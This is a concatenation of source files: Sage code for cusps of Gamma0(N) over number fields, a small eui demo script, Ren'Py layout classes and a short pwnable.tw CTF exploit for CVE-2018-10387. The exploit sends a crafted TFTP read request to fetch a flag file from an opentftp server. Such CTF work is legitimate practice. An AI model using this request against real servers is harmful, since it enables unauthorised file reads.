                if not Transformation:
                    return True
                else:
                    # Build the explicit transformation M2 * Maux * M1^-1.
                    AuxCoeff = [1, 0, 0, 1]
                    Aux = M2[2] * M1[3] - u * M1[2] * M2[3]
                    if Aux in A * B * N:
                        if u != 1:
                            AuxCoeff[3] = u
                    else:
                        # Correct the off-diagonal entry so the result
                        # lands in Gamma_0(N).
                        A1 = (A * B * N) / ABdelta
                        A2 = B * k.ideal(M1[2] * M2[2]) / (A * ABdelta)
                        f = A1.element_1_mod(A2)
                        w = ((1 - f) * Aux) / (M1[2] * M2[2])
                        AuxCoeff[3] = u
                        AuxCoeff[1] = w
                    from sage.matrix.all import Matrix
                    Maux = Matrix(k, 2, AuxCoeff)
                    M1inv = Matrix(k, 2, M1).inverse()
                    Mtrans = Matrix(k, 2, M2) * Maux * M1inv
                    # Lower-left entry in N is the Gamma_0(N) condition.
                    assert Mtrans[1][0] in N
                    return True, Mtrans.list()
        if not Transformation:
            return False
        else:
            return False, 0
# *************************************************************************
# Global functions:
# - Gamma0_NFCusps --compute list of inequivalent cusps
# Internal use only:
# - number_of_Gamma0_NFCusps -- useful to test Gamma0_NFCusps
# - NFCusps_ideal_reps_for_levelN -- lists of reps for ideal classes
# - units_mod_ideal -- needed to check Gamma0(N)-equiv of cusps
# *************************************************************************
def Gamma0_NFCusps(N):
    r"""
    Return a list of inequivalent cusps for `\Gamma_0(N)`, i.e., a set of
    representatives for the orbits of ``self`` on `\mathbb{P}^1(k)`.
    INPUT:
    - ``N`` -- an integral ideal of the number field k (the level).
    OUTPUT:
    A list of inequivalent number field cusps.
    EXAMPLES::
        sage: k.<a> = NumberField(x^2 + 5)
        sage: N = k.ideal(3)
        sage: L = Gamma0_NFCusps(N)
    The cusps in the list are inequivalent::
        sage: any(L[i].is_Gamma0_equivalent(L[j], N)
        ....:     for i in range(len(L)) for j in range(len(L)) if i < j)
        False
    We test that we obtain the right number of orbits::
        sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
        sage: len(L) == number_of_Gamma0_NFCusps(N)
        True
    Another example::
        sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
        sage: N = k.ideal(5)
        sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
        sage: len(Gamma0_NFCusps(N)) == number_of_Gamma0_NFCusps(N) # long time (over 1 sec)
        True
    """
    # We create L a list of three lists, which are different and each a list of
    # prime ideals, coprime to N, representing the ideal classes of k
    L = NFCusps_ideal_reps_for_levelN(N, nlists=3)
    Laux = L[1] + L[2]
    Lreps = list_of_representatives(N)
    Lcusps = [ ]
    k = N.number_field()
    for A in L[0]:
        # find B in inverse class:
        if A.is_trivial():
            B = k.ideal(1)
            # B = k.unit_ideal() produces an error because we need fract ideal
            g = 1
        else:
            Lbs = [P for P in Laux if (P * A).is_principal()]
            B = Lbs[0]
            g = (A * B).gens_reduced()[0]
        # for every divisor of N we have to find cusps
        from sage.arith.all import divisors
        for d in divisors(N):
            # find delta prime coprime to B in inverse class of d*A
            # by searching in our list of auxiliary prime ideals
            Lds = [P for P in Laux
                   if (P * d * A).is_principal() and P.is_coprime(B)]
            deltap = Lds[0]
            a = (deltap * d * A).gens_reduced()[0]
            I = d + N / d
            # special case: A=B=d=<1>:
            if a.is_one() and I.is_trivial():
                Lcusps.append(NFCusp(k, 0, 1, lreps=Lreps))
            else:
                u = k.unit_group().gens()
                for b in I.invertible_residues_mod(u):
                    # NOTE: the name u is rebound below, shadowing the
                    # unit-group generators for the rest of this loop body.
                    # Note: if I trivial, invertible_residues_mod returns [1]
                    # lift b to (R/a)star
                    # we need the part of d which is coprime to I, call it M
                    M = d.prime_to_idealM_part(I)
                    deltAM = deltap * A * M
                    u = (B * deltAM).element_1_mod(I)
                    v = (I * B).element_1_mod(deltAM)
                    newb = u * b + v
                    # build AB-matrix:
                    # ----> extended gcd for k.ideal(a), k.ideal(newb)
                    Y = k.ideal(newb).element_1_mod(k.ideal(a))
                    # if xa + yb = 1, cusp = y*g /a
                    Lcusps.append(NFCusp(k, Y * g, a, lreps=Lreps))
    return Lcusps
def number_of_Gamma0_NFCusps(N):
    r"""
    Return the total number of orbits of cusps under the action of the
    congruence subgroup `\Gamma_0(N)`.

    INPUT:

    - ``N`` -- a number field ideal.

    OUTPUT:

    integer -- the number of orbits of cusps under Gamma0(N)-action.

    EXAMPLES::

        sage: k.<a> = NumberField(x^3 + 11)
        sage: N = k.ideal(2, a+1)
        sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
        sage: number_of_Gamma0_NFCusps(N)
        4
        sage: L = Gamma0_NFCusps(N)
        sage: len(L) == number_of_Gamma0_NFCusps(N)
        True
        sage: k.<a> = NumberField(x^2 + 7)
        sage: N = k.ideal(9)
        sage: number_of_Gamma0_NFCusps(N)
        6
        sage: N = k.ideal(a*9 + 7)
        sage: number_of_Gamma0_NFCusps(N)
        24
    """
    from sage.arith.all import divisors

    k = N.number_field()
    unit_images = [k(u) for u in k.unit_group().gens()]

    # Count the Gamma0(N)-sub-orbits inside one Gamma-orbit: one term
    # per divisor d of the level N.
    suborbits = 0
    for d in divisors(N):
        suborbits += len((d + N / d).invertible_residues_mod(unit_images))

    # There is one Gamma-orbit for every ideal class, h in total.
    return suborbits * k.class_number()
def NFCusps_ideal_reps_for_levelN(N, nlists=1):
    """
    Return a list of lists (``nlists`` different lists) of prime ideals,
    coprime to ``N``, representing every ideal class of the number field.

    INPUT:

    - ``N`` -- number field ideal.
    - ``nlists`` -- optional (default 1). The number of lists of prime
      ideals we want.

    OUTPUT:

    A list of lists of ideals representatives of the ideal classes, all
    coprime to ``N``, representing every ideal.

    EXAMPLES::

        sage: k.<a> = NumberField(x^3 + 11)
        sage: N = k.ideal(5, a + 1)
        sage: from sage.modular.cusps_nf import NFCusps_ideal_reps_for_levelN
        sage: NFCusps_ideal_reps_for_levelN(N)
        [(Fractional ideal (1), Fractional ideal (2, a + 1))]
        sage: L = NFCusps_ideal_reps_for_levelN(N, 3)
        sage: all(len(L[i]) == k.class_number() for i in range(len(L)))
        True

    ::

        sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
        sage: N = k.ideal(6)
        sage: from sage.modular.cusps_nf import NFCusps_ideal_reps_for_levelN
        sage: NFCusps_ideal_reps_for_levelN(N)
        [(Fractional ideal (1),
          Fractional ideal (67, a + 17),
          Fractional ideal (127, a + 48),
          Fractional ideal (157, a - 19))]
        sage: L = NFCusps_ideal_reps_for_levelN(N, 5)
        sage: all(len(L[i]) == k.class_number() for i in range(len(L)))
        True
    """
    k = N.number_field()
    G = k.class_group()

    # Each list starts with the unit ideal, which represents the
    # principal class in every list.
    reps = [[k.ideal(1)] for _ in range(nlists)]

    prime_iter = k.primes_of_degree_one_iter()
    for cl in G.list():
        # The principal class is already covered by k.ideal(1).
        if cl.is_principal():
            continue
        inverse = (cl.ideal())**(-1)
        # Walk the degree-one primes until each list has a distinct
        # representative of this class that is coprime to N.
        found = 0
        while found < nlists:
            J = next(prime_iter)
            if (J * inverse).is_principal() and J.is_coprime(N):
                reps[found].append(J)
                found += 1
    return [tuple(r) for r in reps]
def units_mod_ideal(I):
    """
    Return integral elements of the number field representing the images of
    the global units modulo the ideal ``I``.

    INPUT:

    - ``I`` -- number field ideal.

    OUTPUT:

    A list of integral elements of the number field representing the images
    of the global units modulo the ideal ``I``. Elements of the list might
    be equivalent to each other mod ``I``.

    EXAMPLES::

        sage: from sage.modular.cusps_nf import units_mod_ideal
        sage: k.<a> = NumberField(x^2 + 1)
        sage: I = k.ideal(a + 1)
        sage: units_mod_ideal(I)
        [1]
        sage: I = k.ideal(3)
        sage: units_mod_ideal(I)
        [1, a, -1, -a]

    ::

        sage: from sage.modular.cusps_nf import units_mod_ideal
        sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
        sage: I = k.ideal(3)
        sage: U = units_mod_ideal(I)
        sage: all(U[j].is_unit() and (U[j] not in I) for j in range(len(U)))
        True
    """
    from sage.misc.mrange import xmrange

    k = I.number_field()
    generators = k.unit_group().gens_values()
    Istar = I.idealstar(2)

    # Order of the image of each fundamental unit in (O_k/I)^*.
    orders = [Istar(I.ideallog(u)).order() for u in generators]

    # Enumerate all exponent vectors below those orders and multiply
    # out the corresponding unit products.
    images = []
    for exponents in xmrange(orders):
        images.append(k.prod(u**e for u, e in zip(generators, exponents)))
    return images
| 32.717496 | 119 | 0.504195 |
acfa7ab1e8bb225595a0abde1b31832133d2efc4 | 336 | py | Python | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | import os
import webbrowser
import eui
def say_hello(message):
    """Handler for the 'say_hello' message: log it, then echo it back
    to the front end by calling the JS function `sayHello`."""
    print('receive message from js:', message)
    eui.js('sayHello', message)
def startup_callback():
    """Open the bundled UI page in the default browser once eui starts."""
    # NOTE(review): the path is built from the current working directory,
    # so this assumes the script is launched from the project root —
    # confirm before packaging.
    webbrowser.open(os.getcwd() + '/static/index.html')
# Route table: message names arriving from the JS side mapped to their
# Python handler functions.
handlers = {
    'say_hello': say_hello
}
# Start the eui bridge; `startup_callback` is invoked once the server
# is up, which opens the UI page in the browser.
eui.start(handlers=handlers, startup_callback=startup_callback)
| 16 | 63 | 0.720238 |
acfa7b498e7f2bd8b4baf298caf57ef43270bab4 | 464 | py | Python | CVE-2018-10387/exploit.py | s3cc0mp/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | 1 | 2021-03-31T11:02:37.000Z | 2021-03-31T11:02:37.000Z | CVE-2018-10387/exploit.py | wxrdnx/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | null | null | null | CVE-2018-10387/exploit.py | wxrdnx/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | null | null | null | from pwn import *
import struct
import socket
io = remote('chall.pwnable.tw', 10206)
io.recvuntil('start challenge on udp port: ')
port = int(io.recvlineS(keepends = False))
opcode = 1
flag_file = b'//home/opentftp/flag\0'
mode = b'ascii\0'
payload = struct.pack('>H', 1) + flag_file + mode
opentftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
opentftp.sendto(payload, ('chall.pwnable.tw', port))
result = opentftp.recv(1024)
print(result)
io.close()
| 21.090909 | 59 | 0.719828 |
acfa7b8d4fdc8c9ddb8de9a6b6a6c0b379e37b60 | 54,394 | py | Python | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | 1 | 2015-08-13T17:09:40.000Z | 2015-08-13T17:09:40.000Z | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | null | null | null | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | null | null | null | # Copyright 2004-2014 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains classes that handle layout of displayables on
# the screen.
from renpy.display.render import render, Render
import renpy.display
import pygame
def scale(num, base):
    """
    Interpret ``num`` relative to ``base``.

    A float is treated as a fraction of ``base`` and multiplied by it;
    any other value (typically an absolute int) is returned unchanged.
    """

    if not isinstance(num, float):
        return num
    return num * base
class Null(renpy.display.core.Displayable):
    """
    :doc: disp_imagelike

    A displayable that creates an empty box on the screen. The size
    of the box is controlled by `width` and `height`. This can be used
    when a displayable requires a child, but no child is suitable, or
    as a spacer inside a box.

    ::

        image logo spaced = HBox("logo.png", Null(width=100), "logo.png")
    """

    def __init__(self, width=0, height=0, **properties):
        super(Null, self).__init__(**properties)

        self.width = width
        self.height = height

    def render(self, width, height, st, at):
        # The area offered by the parent is ignored; a Null always
        # renders at its own fixed size.
        empty = renpy.display.render.Render(self.width, self.height)

        # Even an empty box may serve as a focus target.
        if self.focusable:
            empty.add_focus(self, None, None, None, None, None)

        return empty
class Container(renpy.display.core.Displayable):
    """
    This is the base class for containers that can have one or more
    children.
    @ivar children: A list giving the children that have been added to
    this container, in the order that they were added in.
    @ivar child: The last child added to this container. This is also
    used to access the sole child in containers that can only hold
    one child.
    @ivar offsets: A list giving offsets for each of our children.
    It's expected that render will set this up each time it is called.
    @ivar sizes: A list giving sizes for each of our children. It's
    also expected that render will set this each time it is called.
    """
    # We indirect all list creation through this, so that we can
    # use RevertableLists if we want.
    _list_type = list
    def __init__(self, *args, **properties):
        self.children = self._list_type()
        self.child = None
        self.offsets = self._list_type()
        for i in args:
            self.add(i)
        super(Container, self).__init__(**properties)
    def set_style_prefix(self, prefix, root):
        # Propagate the style prefix to every child; only the root of
        # the propagation passes root=True.
        super(Container, self).set_style_prefix(prefix, root)
        for i in self.children:
            i.set_style_prefix(prefix, False)
    def add(self, d):
        """
        Adds a child to this container.
        """
        child = renpy.easy.displayable(d)
        self.children.append(child)
        self.child = child
        # Offsets are stale once the child list changes; render will
        # rebuild them.
        self.offsets = self._list_type()
    def _clear(self):
        # Drop all children and schedule an immediate redraw.
        self.child = None
        self.children = self._list_type()
        self.offsets = self._list_type()
        renpy.display.render.redraw(self, 0)
    def remove(self, d):
        """
        Removes the first instance of child from this container. May
        not work with all containers.
        """
        for i, c in enumerate(self.children):
            if c is d:
                break
        else:
            return
        self.children.pop(i) # W0631
        self.offsets = self._list_type()
        if self.children:
            self.child = self.children[-1]
        else:
            self.child = None
    def update(self):
        """
        This should be called if a child is added to this
        displayable outside of the render function.
        """
        renpy.display.render.invalidate(self)
    def render(self, width, height, st, at):
        # Default layout: render every child into the full area and
        # let each child's placement properties position it.
        rv = Render(width, height)
        self.offsets = self._list_type()
        for c in self.children:
            cr = render(c, width, height, st, at)
            offset = c.place(rv, 0, 0, width, height, cr)
            self.offsets.append(offset)
        return rv
    def event(self, ev, x, y, st):
        # Dispatch to children from top-most (last added) to
        # bottom-most, translating coordinates by each child's offset.
        # (xrange: this file targets Python 2.)
        children = self.children
        offsets = self.offsets
        for i in xrange(len(offsets) - 1, -1, -1):
            d = children[i]
            xo, yo = offsets[i]
            rv = d.event(ev, x - xo, y - yo, st)
            if rv is not None:
                return rv
        return None
    def visit(self):
        return self.children
    # These interact with the ui functions to allow use as a context
    # manager.
    def __enter__(self):
        renpy.ui.context_enter(self)
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        renpy.ui.context_exit(self)
        return False
def LiveComposite(size, *args, **properties):
    """
    :doc: disp_imagelike

    This creates a new displayable of `size`, by compositing other
    displayables. `size` is a (width, height) tuple.

    The remaining positional arguments are used to place images inside
    the LiveComposite. The remaining positional arguments should come
    in groups of two, with the first member of each group an (x, y)
    tuple, and the second member of a group is a displayable that
    is composited at that position.

    Displayables are composited from back to front.

    ::

        image eileen composite = LiveComposite(
            (300, 600),
            (0, 0), "body.png",
            (0, 0), "clothes.png",
            (50, 50), "expression.png")
    """

    properties.setdefault('style', 'image_placement')

    width, height = size

    composite = Fixed(xmaximum=width, ymaximum=height, xminimum=width, yminimum=height, **properties)

    if len(args) % 2 != 0:
        raise Exception("LiveComposite requires an odd number of arguments.")

    # Walk the (position, displayable) pairs, adding each child at its
    # anchor-0 position. Later pairs draw on top of earlier ones.
    for i in range(0, len(args), 2):
        xpos, ypos = args[i]
        child = renpy.easy.displayable(args[i + 1])
        composite.add(Position(child, xpos=xpos, xanchor=0, ypos=ypos, yanchor=0))

    return composite
class Position(Container):
    """
    Controls the placement of a displayable on the screen, using
    supplied position properties. This is the non-curried form of
    Position, which should be used when the user has directly created
    the displayable that will be shown on the screen.
    """

    # The placement components, in the order get_placement returns them.
    _placement_props = ("xpos", "ypos", "xanchor", "yanchor",
                        "xoffset", "yoffset", "subpixel")

    def __init__(self, child, style='image_placement', **properties):
        """
        @param child: The child that is being laid out.
        @param style: The base style of this position.
        @param properties: Position properties that control where the
        child of this widget is placed.
        """

        super(Position, self).__init__(style=style, **properties)
        self.add(child)

    def render(self, width, height, st, at):
        child_render = render(self.child, width, height, st, at)
        self.offsets = [ (0, 0) ]

        rv = renpy.display.render.Render(child_render.width, child_render.height)
        rv.blit(child_render, (0, 0))

        return rv

    def get_placement(self):
        # Start from the child's placement, then let each of our style
        # properties override the matching component when it is set.
        placement = list(self.child.get_placement())

        for index, name in enumerate(self._placement_props):
            value = getattr(self.style, name)
            if value is not None:
                placement[index] = value

        return tuple(placement)
class Grid(Container):
    """
    A grid is a widget that evenly allocates space to its children.
    The child widgets should not be greedy, but should instead be
    widgets that only use part of the space available to them.
    """
    def __init__(self, cols, rows, padding=None,
                 transpose=False,
                 style='grid', **properties):
        """
        @param cols: The number of columns in this widget.
        @params rows: The number of rows in this widget.
        @params transpose: True if the grid should be transposed.
        """
        if padding is not None:
            properties.setdefault('spacing', padding)
        super(Grid, self).__init__(style=style, **properties)
        cols = int(cols)
        rows = int(rows)
        self.cols = cols
        self.rows = rows
        self.transpose = transpose
    def render(self, width, height, st, at):
        # For convenience and speed.
        padding = self.style.spacing
        cols = self.cols
        rows = self.rows
        if len(self.children) != cols * rows:
            if len(self.children) < cols * rows:
                raise Exception("Grid not completely full.")
            else:
                raise Exception("Grid overfull.")
        # When transposed, re-order the children column-major so the
        # layout loop below can always work row-major.
        if self.transpose:
            children = [ ]
            for y in range(rows):
                for x in range(cols):
                    children.append(self.children[y + x * rows])
        else:
            children = self.children
        # Now, start the actual rendering.
        renwidth = width
        renheight = height
        # When filling, divide the available space (minus padding)
        # evenly among the cells. (Python 2 integer division when the
        # sizes are ints.)
        if self.style.xfill:
            renwidth = (width - (cols - 1) * padding) / cols
        if self.style.yfill:
            renheight = (height - (rows - 1) * padding) / rows
        renders = [ render(i, renwidth, renheight, st, at) for i in children ]
        sizes = [ i.get_size() for i in renders ]
        # Every cell gets the size of the largest child.
        cwidth = 0
        cheight = 0
        for w, h in sizes:
            cwidth = max(cwidth, w)
            cheight = max(cheight, h)
        if self.style.xfill:
            cwidth = renwidth
        if self.style.yfill:
            cheight = renheight
        width = cwidth * cols + padding * (cols - 1)
        height = cheight * rows + padding * (rows - 1)
        rv = renpy.display.render.Render(width, height)
        offsets = [ ]
        for y in range(0, rows):
            for x in range(0, cols):
                child = children[ x + y * cols ]
                surf = renders[x + y * cols]
                xpos = x * (cwidth + padding)
                ypos = y * (cheight + padding)
                offset = child.place(rv, xpos, ypos, cwidth, cheight, surf)
                offsets.append(offset)
        # Offsets must line up with self.children's original order, so
        # undo the transposition applied above.
        if self.transpose:
            self.offsets = [ ]
            for x in range(cols):
                for y in range(rows):
                    self.offsets.append(offsets[y * cols + x])
        else:
            self.offsets = offsets
        return rv
class IgnoreLayers(Exception):
    """
    An exception an event handler can raise so the event skips the
    remaining layers but still reaches the underlay.
    """
class MultiBox(Container):
    """
    A container that lays out its children either stacked on top of
    each other ("fixed" layout) or as a horizontal or vertical box,
    chosen by the box_layout style or the `layout` argument. Also used
    to implement layers, in which case `layer_name` or `layers` is set
    and child show/animation times are tracked per child.
    """
    layer_name = None
    first = True
    order_reverse = False
    def __init__(self, spacing=None, layout=None, style='default', **properties):
        if spacing is not None:
            properties['spacing'] = spacing
        super(MultiBox, self).__init__(style=style, **properties)
        # Layout used when the style does not specify box_layout.
        self.default_layout = layout
        # The start and animation times for children of this
        # box.
        self.start_times = [ ]
        self.anim_times = [ ]
        # A map from layer name to the widget corresponding to
        # that layer.
        self.layers = None
        # The scene list for this widget.
        self.scene_list = None
    def _clear(self):
        super(MultiBox, self)._clear()
        self.start_times = [ ]
        self.anim_times = [ ]
        self.layers = None
        self.scene_list = None
    def _in_old_scene(self):
        # Rebuild this box for the old scene, replacing any child whose
        # _in_old_scene differs. Returns self unchanged when nothing
        # differs, so identity comparisons upstream keep working.
        if self.layer_name is not None:
            if self.scene_list is None:
                return self
            scene_list = [ ]
            changed = False
            for old_sle in self.scene_list:
                new_sle = old_sle.copy()
                d = new_sle.displayable._in_old_scene()
                if d is not new_sle.displayable:
                    new_sle.displayable = d
                    changed = True
                scene_list.append(new_sle)
            if not changed:
                return self
            rv = MultiBox(layout=self.default_layout)
            rv.layer_name = self.layer_name
            rv.append_scene_list(scene_list)
        elif self.layers:
            rv = MultiBox(layout=self.default_layout)
            rv.layers = { }
            changed = False
            for layer in renpy.config.layers:
                old_d = self.layers[layer]
                new_d = old_d._in_old_scene()
                if new_d is not old_d:
                    changed = True
                rv.add(new_d)
                rv.layers[layer] = new_d
            if not changed:
                return self
        else:
            return self
        # Carry the cached layout state over to the rebuilt box.
        if self.offsets:
            rv.offsets = list(self.offsets)
        if self.start_times:
            rv.start_times = list(self.start_times)
        if self.anim_times:
            rv.anim_times = list(self.anim_times)
        return rv
    def __unicode__(self):
        layout = self.style.box_layout
        if layout is None:
            layout = self.default_layout
        if layout == "fixed":
            return "Fixed"
        elif layout == "horizontal":
            return "HBox"
        elif layout == "vertical":
            return "VBox"
        else:
            return "MultiBox"
    def add(self, widget, start_time=None, anim_time=None): # W0221
        super(MultiBox, self).add(widget)
        self.start_times.append(start_time)
        self.anim_times.append(anim_time)
    def append_scene_list(self, l):
        # Add each scene list entry as a child, remembering its show
        # and animation times, and keep the raw entries around.
        for sle in l:
            self.add(sle.displayable, sle.show_time, sle.animation_time)
        if self.scene_list is None:
            self.scene_list = [ ]
        self.scene_list.extend(l)
    def render(self, width, height, st, at):
        # Do we need to adjust the child times due to our being a layer?
        if self.layer_name or (self.layers is not None):
            adjust_times = True
        else:
            adjust_times = False
        xminimum = self.style.xminimum
        if xminimum is not None:
            width = max(width, scale(xminimum, width))
        yminimum = self.style.yminimum
        if yminimum is not None:
            height = max(height, scale(yminimum, height))
        # On the first render, pin down missing child times and latch
        # the layout so it stays stable for this box's lifetime.
        if self.first:
            self.first = False
            if adjust_times:
                it = renpy.game.interface.interact_time
                self.start_times = [ i or it for i in self.start_times ]
                self.anim_times = [ i or it for i in self.anim_times ]
            layout = self.style.box_layout
            if layout is None:
                layout = self.default_layout
            self.layout = layout # W0201
        else:
            layout = self.layout
        # Handle time adjustment, store the results in csts and cats.
        if adjust_times:
            t = renpy.game.interface.frame_time
            csts = [ t - start for start in self.start_times ]
            cats = [ t - anim for anim in self.anim_times ]
        else:
            csts = [ st ] * len(self.children)
            cats = [ at ] * len(self.children)
        offsets = [ ]
        if layout == "fixed":
            rv = None
            if self.style.order_reverse:
                iterator = zip(reversed(self.children), reversed(csts), reversed(cats))
            else:
                iterator = zip(self.children, csts, cats)
            for child, cst, cat in iterator:
                surf = render(child, width, height, cst, cat)
                # fit_first shrinks the box to the first child's size.
                if rv is None:
                    if self.style.fit_first:
                        width, height = surf.get_size()
                    rv = renpy.display.render.Render(width, height, layer_name=self.layer_name)
                if surf:
                    offset = child.place(rv, 0, 0, width, height, surf)
                    offsets.append(offset)
                else:
                    offsets.append((0, 0))
            if rv is None:
                rv = renpy.display.render.Render(width, height, layer_name=self.layer_name)
            # Offsets are kept in self.children order for event dispatch.
            if self.style.order_reverse:
                offsets.reverse()
            self.offsets = offsets
            return rv
        # If we're here, we have a box, either horizontal or vertical. Which is good,
        # as we can share some code between boxes.
        spacing = self.style.spacing
        first_spacing = self.style.first_spacing
        if first_spacing is None:
            first_spacing = spacing
        spacings = [ first_spacing ] + [ spacing ] * (len(self.children) - 1)
        box_wrap = self.style.box_wrap
        xfill = self.style.xfill
        yfill = self.style.yfill
        # The shared height and width of the current line. The line_height must
        # be 0 for a vertical box, and the line_width must be 0 for a horizontal
        # box.
        line_width = 0
        line_height = 0
        # The children to layout.
        children = list(self.children)
        if self.style.box_reverse:
            children.reverse()
            spacings.reverse()
        # a list of (child, x, y, w, h, surf) tuples that are turned into
        # calls to child.place().
        placements = [ ]
        # The maximum x and y.
        maxx = 0
        maxy = 0
        def layout_line(line, xfill, yfill):
            """
            Lays out a single line.
            `line` a list of (child, x, y, surf) tuples.
            `xfill` the amount of space to add in the x direction.
            `yfill` the amount of space to add in the y direction.
            """
            xfill = max(0, xfill)
            yfill = max(0, yfill)
            # Distribute leftover fill space evenly among the line's
            # children.
            if line:
                xperchild = xfill / len(line)
                yperchild = yfill / len(line)
            else:
                xperchild = 0
                yperchild = 0
            maxxout = maxx
            maxyout = maxy
            for i, (child, x, y, surf) in enumerate(line):
                sw, sh = surf.get_size()
                sw = max(line_width, sw)
                sh = max(line_height, sh)
                x += i * xperchild
                y += i * yperchild
                sw += xperchild
                sh += yperchild
                placements.append((child, x, y, sw, sh, surf))
                maxxout = max(maxxout, x + sw)
                maxyout = max(maxyout, y + sh)
            return maxxout, maxyout
        x = 0
        y = 0
        full_width = False
        full_height = False
        if layout == "horizontal":
            full_height = yfill
            line_height = 0
            line = [ ]
            remwidth = width
            for d, padding, cst, cat in zip(children, spacings, csts, cats):
                if box_wrap:
                    rw = width
                else:
                    rw = remwidth
                surf = render(d, rw, height - y, cst, cat)
                sw, sh = surf.get_size()
                # Wrap to a new line when the child no longer fits.
                if box_wrap and remwidth - sw - padding <= 0 and line:
                    maxx, maxy = layout_line(line, remwidth if xfill else 0, 0)
                    y += line_height
                    x = 0
                    line_height = 0
                    remwidth = width
                    line = [ ]
                line.append((d, x, y, surf))
                line_height = max(line_height, sh)
                x += sw + padding
                remwidth -= (sw + padding)
            maxx, maxy = layout_line(line, remwidth if xfill else 0, 0)
        elif layout == "vertical":
            full_width = xfill
            line_width = 0
            line = [ ]
            remheight = height
            for d, padding, cst, cat in zip(children, spacings, csts, cats):
                if box_wrap:
                    rh = height
                else:
                    rh = remheight
                surf = render(d, width - x, rh, cst, cat)
                sw, sh = surf.get_size()
                # Wrap to a new column when the child no longer fits.
                if box_wrap and remheight - sh - padding <= 0:
                    maxx, maxy = layout_line(line, 0, remheight if yfill else 0)
                    x += line_width
                    y = 0
                    line_width = 0
                    remheight = height
                    line = [ ]
                line.append((d, x, y, surf))
                line_width = max(line_width, sw)
                y += sh + padding
                remheight -= (sh + padding)
            maxx, maxy = layout_line(line, 0, remheight if yfill else 0)
        else:
            raise Exception("Unknown box layout: %r" % layout)
        # Back to the common for vertical and horizontal.
        if not xfill:
            width = maxx
        if not yfill:
            height = maxy
        rv = renpy.display.render.Render(width, height)
        if self.style.box_reverse ^ self.style.order_reverse:
            placements.reverse()
        for child, x, y, w, h, surf in placements:
            if full_width:
                w = width
            if full_height:
                h = height
            offset = child.place(rv, x, y, w, h, surf)
            offsets.append(offset)
        if self.style.order_reverse:
            offsets.reverse()
        self.offsets = offsets
        return rv
    def event(self, ev, x, y, st):
        # Dispatch top-most child first, adjusting each child's shown
        # time when this box is a layer. (zip returns a list here:
        # this file targets Python 2.)
        children_offsets = zip(self.children, self.offsets, self.start_times)
        if not self.style.order_reverse:
            children_offsets.reverse()
        try:
            for i, (xo, yo), t in children_offsets:
                if t is None:
                    cst = st
                else:
                    cst = renpy.game.interface.event_time - t
                rv = i.event(ev, x - xo, y - yo, cst)
                if rv is not None:
                    return rv
        # IgnoreLayers skips the remaining layers but propagates past
        # the layer container itself.
        except IgnoreLayers:
            if self.layers:
                return None
            else:
                raise
        return None
def Fixed(**properties):
    """
    Return a MultiBox using the fixed layout, which renders each child
    into the full area so children stack on top of each other.
    """
    return MultiBox(layout='fixed', **properties)
class SizeGroup(renpy.object.Object):
    """
    Tracks a group of displayables that should share a common width:
    the maximum rendered width over all members. Windows join a group
    via their size_group style (see Window.per_interact).
    """
    def __init__(self, frame):
        super(SizeGroup, self).__init__()
        self.members = [ ]
        # Cached shared width; None until computed.
        self._width = None
        # Reentrancy guard: width() renders members, which may ask for
        # the group width again.
        self.computing_width = False
    def width(self, width, height, st, at):
        """
        Return the shared width: the maximum width of all members when
        rendered into (width, height). Returns 0 on reentrant calls.
        """
        if self._width is not None:
            return self._width
        if self.computing_width:
            return 0
        self.computing_width = True
        maxwidth = 0
        for i in self.members:
            rend = renpy.display.render.render(i, width, height, st, at)
            maxwidth = max(rend.width, maxwidth)
            # The measuring render must not be treated as the real one.
            renpy.display.render.invalidate(i)
        self._width = maxwidth
        self.computing_width = False
        return maxwidth
size_groups = dict()
class Window(Container):
    """
    A window that has padding and margins, and can place a background
    behind its child. `child` is the child added to this
    displayable. All other properties are as for the :ref:`Window`
    screen language statement.
    """
    def __init__(self, child=None, style='window', **properties):
        super(Window, self).__init__(style=style, **properties)
        if child is not None:
            self.add(child)
    def visit(self):
        # The background participates in prediction/visiting too.
        return [ self.style.background ] + self.children
    def get_child(self):
